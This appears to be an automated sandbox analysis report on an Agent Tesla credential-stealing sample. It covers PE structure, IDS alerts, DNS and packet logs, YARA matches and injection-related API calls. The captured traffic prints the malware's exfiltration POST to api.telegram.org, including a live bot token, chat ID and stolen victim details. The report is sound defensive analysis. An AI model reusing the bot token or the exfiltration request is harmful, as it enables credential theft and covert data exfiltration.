add byte ptr [eax], al
add byte ptr [eax], al
push ss
inc eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
sub byte ptr [eax+66h], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa3dc8	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xa6000	0x4854	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xac000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xa3dac	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xa2050	0xa2200	False	0.9359384035273709	data	7.934508263967678	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xa6000	0x4854	0x4a00	False	0.5450802364864865	data	6.213792802382621	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xac000	0xc	0x200	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0xa6130	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16384
RT_GROUP_ICON	0xaa358	0x14	data
RT_VERSION	0xaa36c	0x2fc	data
RT_MANIFEST	0xaa668	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.3149.154.167.220497034432851779 11/03/22-12:21:37.839026	TCP	2851779	ETPRO TROJAN Agent Tesla Telegram Exfil	49703	443	192.168.2.3	149.154.167.220

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 3, 2022 12:21:25.394248962 CET	49702	443	192.168.2.3	3.220.57.224
Nov 3, 2022 12:21:25.394336939 CET	443	49702	3.220.57.224	192.168.2.3
Nov 3, 2022 12:21:25.394505978 CET	49702	443	192.168.2.3	3.220.57.224
Nov 3, 2022 12:21:25.438405037 CET	49702	443	192.168.2.3	3.220.57.224
Nov 3, 2022 12:21:25.438488960 CET	443	49702	3.220.57.224	192.168.2.3
Nov 3, 2022 12:21:25.732002020 CET	443	49702	3.220.57.224	192.168.2.3
Nov 3, 2022 12:21:25.732249022 CET	49702	443	192.168.2.3	3.220.57.224
Nov 3, 2022 12:21:25.737373114 CET	49702	443	192.168.2.3	3.220.57.224
Nov 3, 2022 12:21:25.737407923 CET	443	49702	3.220.57.224	192.168.2.3
Nov 3, 2022 12:21:25.737855911 CET	443	49702	3.220.57.224	192.168.2.3
Nov 3, 2022 12:21:25.871424913 CET	49702	443	192.168.2.3	3.220.57.224
Nov 3, 2022 12:21:26.340863943 CET	49702	443	192.168.2.3	3.220.57.224
Nov 3, 2022 12:21:26.340910912 CET	443	49702	3.220.57.224	192.168.2.3
Nov 3, 2022 12:21:26.480662107 CET	443	49702	3.220.57.224	192.168.2.3
Nov 3, 2022 12:21:26.480782986 CET	443	49702	3.220.57.224	192.168.2.3
Nov 3, 2022 12:21:26.480864048 CET	49702	443	192.168.2.3	3.220.57.224
Nov 3, 2022 12:21:26.504179955 CET	49702	443	192.168.2.3	3.220.57.224
Nov 3, 2022 12:21:37.714263916 CET	49703	443	192.168.2.3	149.154.167.220
Nov 3, 2022 12:21:37.714333057 CET	443	49703	149.154.167.220	192.168.2.3
Nov 3, 2022 12:21:37.714464903 CET	49703	443	192.168.2.3	149.154.167.220
Nov 3, 2022 12:21:37.715651989 CET	49703	443	192.168.2.3	149.154.167.220
Nov 3, 2022 12:21:37.715696096 CET	443	49703	149.154.167.220	192.168.2.3
Nov 3, 2022 12:21:37.786349058 CET	443	49703	149.154.167.220	192.168.2.3
Nov 3, 2022 12:21:37.786521912 CET	49703	443	192.168.2.3	149.154.167.220
Nov 3, 2022 12:21:37.791690111 CET	49703	443	192.168.2.3	149.154.167.220
Nov 3, 2022 12:21:37.791733980 CET	443	49703	149.154.167.220	192.168.2.3
Nov 3, 2022 12:21:37.792078972 CET	443	49703	149.154.167.220	192.168.2.3
Nov 3, 2022 12:21:37.795787096 CET	49703	443	192.168.2.3	149.154.167.220
Nov 3, 2022 12:21:37.795840025 CET	443	49703	149.154.167.220	192.168.2.3
Nov 3, 2022 12:21:37.834764957 CET	443	49703	149.154.167.220	192.168.2.3
Nov 3, 2022 12:21:37.838870049 CET	49703	443	192.168.2.3	149.154.167.220
Nov 3, 2022 12:21:37.838929892 CET	443	49703	149.154.167.220	192.168.2.3
Nov 3, 2022 12:21:53.483609915 CET	443	49703	149.154.167.220	192.168.2.3
Nov 3, 2022 12:21:53.483799934 CET	443	49703	149.154.167.220	192.168.2.3
Nov 3, 2022 12:21:53.483903885 CET	49703	443	192.168.2.3	149.154.167.220
Nov 3, 2022 12:21:53.484666109 CET	49703	443	192.168.2.3	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 3, 2022 12:21:25.296978951 CET	49977	53	192.168.2.3	8.8.8.8
Nov 3, 2022 12:21:25.315884113 CET	53	49977	8.8.8.8	192.168.2.3
Nov 3, 2022 12:21:25.329701900 CET	57840	53	192.168.2.3	8.8.8.8
Nov 3, 2022 12:21:25.348983049 CET	53	57840	8.8.8.8	192.168.2.3
Nov 3, 2022 12:21:37.687520981 CET	57990	53	192.168.2.3	8.8.8.8
Nov 3, 2022 12:21:37.710592985 CET	53	57990	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 3, 2022 12:21:25.296978951 CET	192.168.2.3	8.8.8.8	0x8663	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:21:25.329701900 CET	192.168.2.3	8.8.8.8	0xa62b	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:21:37.687520981 CET	192.168.2.3	8.8.8.8	0xe0ee	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 3, 2022 12:21:25.315884113 CET	8.8.8.8	192.168.2.3	0x8663	No error (0)	api.ipify.org	api.ipify.org.herokudns.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 3, 2022 12:21:25.315884113 CET	8.8.8.8	192.168.2.3	0x8663	No error (0)	api.ipify.org.herokudns.com		3.220.57.224	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:21:25.315884113 CET	8.8.8.8	192.168.2.3	0x8663	No error (0)	api.ipify.org.herokudns.com		3.232.242.170	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:21:25.315884113 CET	8.8.8.8	192.168.2.3	0x8663	No error (0)	api.ipify.org.herokudns.com		54.91.59.199	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:21:25.315884113 CET	8.8.8.8	192.168.2.3	0x8663	No error (0)	api.ipify.org.herokudns.com		52.20.78.240	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:21:25.348983049 CET	8.8.8.8	192.168.2.3	0xa62b	No error (0)	api.ipify.org	api.ipify.org.herokudns.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 3, 2022 12:21:25.348983049 CET	8.8.8.8	192.168.2.3	0xa62b	No error (0)	api.ipify.org.herokudns.com		52.20.78.240	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:21:25.348983049 CET	8.8.8.8	192.168.2.3	0xa62b	No error (0)	api.ipify.org.herokudns.com		3.220.57.224	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:21:25.348983049 CET	8.8.8.8	192.168.2.3	0xa62b	No error (0)	api.ipify.org.herokudns.com		3.232.242.170	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:21:25.348983049 CET	8.8.8.8	192.168.2.3	0xa62b	No error (0)	api.ipify.org.herokudns.com		54.91.59.199	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:21:37.710592985 CET	8.8.8.8	192.168.2.3	0xe0ee	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.ipify.org

api.telegram.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49702	3.220.57.224	443	C:\Users\user\Desktop\rzN2ckYW24.exe

Timestamp	Direction	Data
2022-11-03 11:21:26 UTC	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 Host: api.ipify.org Connection: Keep-Alive
2022-11-03 11:21:26 UTC	IN	HTTP/1.1 200 OK Server: Cowboy Connection: close Content-Type: text/plain Vary: Origin Date: Thu, 03 Nov 2022 11:21:26 GMT Content-Length: 14 Via: 1.1 vegur
2022-11-03 11:21:26 UTC	IN	Data Raw: 31 30 32 2e 31 32 39 2e 31 34 33 2e 31 35 Data Ascii: 102.129.143.15

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49703	149.154.167.220	443	C:\Users\user\Desktop\rzN2ckYW24.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-03 11:21:37 UTC	0	OUT	POST /bot5577155192:AAEz6ZTkghx2RsdTxeeE-sDulPHc5WQblVg/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dabd95f4b3e0e1 Host: api.telegram.org Content-Length: 1063 Expect: 100-continue Connection: Keep-Alive
2022-11-03 11:21:37 UTC	0	IN	HTTP/1.1 100 Continue
2022-11-03 11:21:37 UTC	0	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 62 64 39 35 66 34 62 33 65 30 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 35 39 36 35 33 34 32 37 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 62 64 39 35 66 34 62 33 65 30 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 68 61 72 64 7a 2f 31 33 34 33 34 39 0a 4f 53 46 75 6c 6c Data Ascii: -----------------------------8dabd95f4b3e0e1Content-Disposition: form-data; name="chat_id"5596534279-----------------------------8dabd95f4b3e0e1Content-Disposition: form-data; name="caption"New PW Recovered!User Name: user/134349OSFull
2022-11-03 11:21:37 UTC	1	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 62 64 39 35 66 34 62 33 65 30 65 31 2d 2d 0d 0a Data Ascii: --------------------8dabd95f4b3e0e1--
2022-11-03 11:21:53 UTC	1	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Thu, 03 Nov 2022 11:21:53 GMT Content-Type: application/json Content-Length: 688 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":50,"from":{"id":5577155192,"is_bot":true,"first_name":"Kay111","username":"Kay111_bot"},"chat":{"id":5596534279,"first_name":"MR","last_name":"KAY","type":"private"},"date":1667474513,"document":{"file_name":"user-134349 2022-11-03 12-21-37.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAMyY2OkUUnNkM1JKxT7YenfIZDTlfAAAooOAAJ0ciBTWZevGYTzjT0qBA","file_unique_id":"AgADig4AAnRyIFM","file_size":467},"caption":"New PW Recovered!\n\nUser Name: user/134349\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 102.129.143.15","caption_entities":[{"offset":152,"length":14,"type":"url"}]}}

Target ID:	0
Start time:	12:21:03
Start date:	03/11/2022
Path:	C:\Users\user\Desktop\rzN2ckYW24.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\rzN2ckYW24.exe
Imagebase:	0x9c0000
File size:	684032 bytes
MD5 hash:	44159444C9BC9980871B80B3AE071FFB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.294910636.0000000002D57000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.293830899.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.299828968.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.299828968.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000000.00000002.299828968.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Target ID:	1
Start time:	12:21:14
Start date:	03/11/2022
Path:	C:\Users\user\Desktop\rzN2ckYW24.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\rzN2ckYW24.exe
Imagebase:	0x170000
File size:	684032 bytes
MD5 hash:	44159444C9BC9980871B80B3AE071FFB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

Target ID:	2
Start time:	12:21:15
Start date:	03/11/2022
Path:	C:\Users\user\Desktop\rzN2ckYW24.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\rzN2ckYW24.exe
Imagebase:	0x470000
File size:	684032 bytes
MD5 hash:	44159444C9BC9980871B80B3AE071FFB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.522788647.0000000002854000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.522788647.0000000002854000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000000.279572374.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000002.00000000.279572374.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000002.00000000.279572374.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.522385247.0000000002801000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.522385247.0000000002801000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Execution Graph

Execution Coverage:	11.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	208
Total number of Limit Nodes:	25

Executed Functions

Function 02B3B898 Relevance: 6.1, APIs: 4, Instructions: 125
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 02B3B908
GetCurrentThread.KERNEL32 ref: 02B3B945
GetCurrentProcess.KERNEL32 ref: 02B3B982
GetCurrentThreadId.KERNEL32 ref: 02B3B9DB

Memory Dump Source

Source File: 00000000.00000002.293555161.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b30000_rzN2ckYW24.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 9d50ea1213d219b332dd7d94f89f63657dad07818583802df421e5e9cf2e1dd0
Instruction ID: 2f9d4edde8e192fc18d58501005b5794d36cde8088d42803b77a23533cb879f6
Opcode Fuzzy Hash: 9d50ea1213d219b332dd7d94f89f63657dad07818583802df421e5e9cf2e1dd0
Instruction Fuzzy Hash: AC5175B09142488FDB14CFA9D588BEEBBF0EF48318F2081AAE449A7290D7746844CF61

Uniqueness

Uniqueness Score: -1.00%

Function 02B3B8A8 Relevance: 6.1, APIs: 4, Instructions: 120
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 02B3B908
GetCurrentThread.KERNEL32 ref: 02B3B945
GetCurrentProcess.KERNEL32 ref: 02B3B982
GetCurrentThreadId.KERNEL32 ref: 02B3B9DB

Memory Dump Source

Source File: 00000000.00000002.293555161.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b30000_rzN2ckYW24.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: dfd8821814c50e7be26bbb802e683611a3821610b6e53637232a5b4213649b59
Instruction ID: 3a07bbb360713e12ab4a053973715cde45acde83513c8ee966be67694edbad08
Opcode Fuzzy Hash: dfd8821814c50e7be26bbb802e683611a3821610b6e53637232a5b4213649b59
Instruction Fuzzy Hash: 355165B09146498FDB14CFA9D588BEEBBF0FF48318F208199E519A7390D7746844CF65

Uniqueness

Uniqueness Score: -1.00%

Function 075F9FF0 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 075FA226

Memory Dump Source

Source File: 00000000.00000002.309279593.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75f0000_rzN2ckYW24.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 40d2e0a44b3c33c0d781233b5479decfc9430596dce732d74b4810e6b2237115
Instruction ID: c0336f8a834d86e6c119ab7e4343194b256570443d585eec1129516ed398fd6b
Opcode Fuzzy Hash: 40d2e0a44b3c33c0d781233b5479decfc9430596dce732d74b4810e6b2237115
Instruction Fuzzy Hash: ED917CB1D00219CFDB10CFA8CC41BEEBBB6BF49314F05856AD918A7280DB759985CF92

Uniqueness

Uniqueness Score: -1.00%

Function 02B395B0 Relevance: 1.7, APIs: 1, Instructions: 194
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 02B397F6

Memory Dump Source

Source File: 00000000.00000002.293555161.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b30000_rzN2ckYW24.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 005522b2f97db43472d3703e2fa7bdd38bb1de7b5486ae07dc36e80c8da1a3e0
Instruction ID: 0811ab654e3c28991e07cf12b1f86bcff032fba3f6deabce8664b5dd2960d7fd
Opcode Fuzzy Hash: 005522b2f97db43472d3703e2fa7bdd38bb1de7b5486ae07dc36e80c8da1a3e0
Instruction Fuzzy Hash: 81712370A00B058FDB25DF2AD444B9ABBF5FF88304F008969D58ADBA40DB75E849CF91

Uniqueness

Uniqueness Score: -1.00%

Function 02B35368 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 02B35421

Memory Dump Source

Source File: 00000000.00000002.293555161.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b30000_rzN2ckYW24.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 455d39b05696ac6be9f5f6ce2fa62b695dbf9a5c683285b248fbec31eaf5b53c
Instruction ID: 2faa549723da312a25c5dc6b1d072c4bf2c4ba6c81aff7da7e21f2a2fc9515b2
Opcode Fuzzy Hash: 455d39b05696ac6be9f5f6ce2fa62b695dbf9a5c683285b248fbec31eaf5b53c
Instruction Fuzzy Hash: F7412271C0421CCBDB24CFA9C884BDEBBB5BF88308F548069D408AB251DB796945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02B33DE4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 02B35421

Memory Dump Source

Source File: 00000000.00000002.293555161.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b30000_rzN2ckYW24.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: f2f00eb52ce425a8c8d714b0fa074bf3a4a336f2160fb740f02e49978eb33483
Instruction ID: f506c3483ad0d8395f5248e17486e709c6a684e03df9d0aa42329c43946cc9b1
Opcode Fuzzy Hash: f2f00eb52ce425a8c8d714b0fa074bf3a4a336f2160fb740f02e49978eb33483
Instruction Fuzzy Hash: 33411271C0461CCBDB24DFA9C884BDEBBB5BF48309F548069D508BB251DBB56945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 075F98D8 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 075F9968

Memory Dump Source

Source File: 00000000.00000002.309279593.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75f0000_rzN2ckYW24.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 692190ddecd5171d4491f14b6d72c605caea71047feaaf21e2c523922c2a9d30
Instruction ID: 8880898bd306a5709ccd26bb1948d15cab10c8cfb900ab16accad9f3bdf2615f
Opcode Fuzzy Hash: 692190ddecd5171d4491f14b6d72c605caea71047feaaf21e2c523922c2a9d30
Instruction Fuzzy Hash: 382139B19043499FCF10CFA9C984BEEBBF5FF48314F01842AE959A7240D778A954CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B3BAC8 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02B3BB57

Memory Dump Source

Source File: 00000000.00000002.293555161.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b30000_rzN2ckYW24.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 8dab9736f142507918aca763968ed50b6597f085e1dd2e6d6d92482e62a7ea33
Instruction ID: fed883bb152c47739d12b6e9e8410f0df1f08aa44a40e362d07e7a7f1399fb77
Opcode Fuzzy Hash: 8dab9736f142507918aca763968ed50b6597f085e1dd2e6d6d92482e62a7ea33
Instruction Fuzzy Hash: 9C21E5B69002089FDB10CF99D984ADEBBF8FB48324F14845AE914A7350D774A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 075F9650 Relevance: 1.6, APIs: 1, Instructions: 63
threadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetThreadContext.KERNELBASE(?,00000000), ref: 075F96CE

Memory Dump Source

Source File: 00000000.00000002.309279593.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75f0000_rzN2ckYW24.jbxd

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 26e31d0d3217f7530cb35cfe564b13b0f3265108a0dfcd52c3c75504fa45da7d
Instruction ID: a3107739d5e2fed6d913a62dbd640ceb17e13ee00a9b83f52e6d3511776d5645
Opcode Fuzzy Hash: 26e31d0d3217f7530cb35cfe564b13b0f3265108a0dfcd52c3c75504fa45da7d
Instruction Fuzzy Hash: C12129B1D047498FDB10DFAAC4847EEBBF4FF88218F14842AD559A7240DB78A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 075F99F8 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 075F9A78

Memory Dump Source

Source File: 00000000.00000002.309279593.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75f0000_rzN2ckYW24.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 9edbb0d3e4242600be3821d849185117945113db7082a78517227c9a5cdbec85
Instruction ID: 9535a401594f72db33e9966b708037561351da7039c0951e7d5cdedde52893b5
Opcode Fuzzy Hash: 9edbb0d3e4242600be3821d849185117945113db7082a78517227c9a5cdbec85
Instruction Fuzzy Hash: E92128B19052499FCB00DFA9C884BEEFBF5FF48314F50842AE559A7240D738A944CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02B3BAD0 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02B3BB57

Memory Dump Source

Source File: 00000000.00000002.293555161.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b30000_rzN2ckYW24.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: af95243cd522aea019e5c2c16bae2cd7fcce303bc84eaa7bb949c0a8e855b024
Instruction ID: 7a636d584f45090c98ca73642cad43fedb55c3160a5cbe9f7e3b12f79fcd031f
Opcode Fuzzy Hash: af95243cd522aea019e5c2c16bae2cd7fcce303bc84eaa7bb949c0a8e855b024
Instruction Fuzzy Hash: 8821C4B59002489FDB10CF99D984AEEBBF8FB48324F14845AE954A7350D374A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02B39038 Relevance: 1.6, APIs: 1, Instructions: 55
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02B39871,00000800,00000000,00000000), ref: 02B39A82

Memory Dump Source

Source File: 00000000.00000002.293555161.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b30000_rzN2ckYW24.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 5daf0972afd835cc2d91ebe703ad5f7466319e79540bd0c4f81206f3fa86cd4b
Instruction ID: 4bd35719d73e92c95c4d5f39010ecebd8c22c2734b3b2c261b8c6bd20e5787f5
Opcode Fuzzy Hash: 5daf0972afd835cc2d91ebe703ad5f7466319e79540bd0c4f81206f3fa86cd4b
